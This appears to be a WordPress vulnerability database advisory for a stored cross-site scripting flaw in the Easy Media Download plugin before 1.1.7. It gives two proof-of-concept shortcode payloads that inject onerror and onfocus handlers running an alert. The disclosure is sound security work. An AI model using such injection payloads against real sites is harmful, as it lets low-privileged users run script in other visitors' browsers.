WordPress Plugin Vulnerabilities
Easy Media Download < 1.1.7 - Contributor+ Stored Cross-Site Scripting
Description
The plugin does not escape the text argument of its shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.
Proof of Concept
Affected argument: url, text, target, rel and class [easy_media_download url="/" text='" onerror="alert(/XSS/)//http'] [easy_media_download url="/" text="a" target='"autofocus onfocus=alert(/XSS/)//']
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-22 (about 2 years ago)
Added
2021-09-22 (about 2 years ago)
Last Updated
2023-02-03 (about 1 years ago)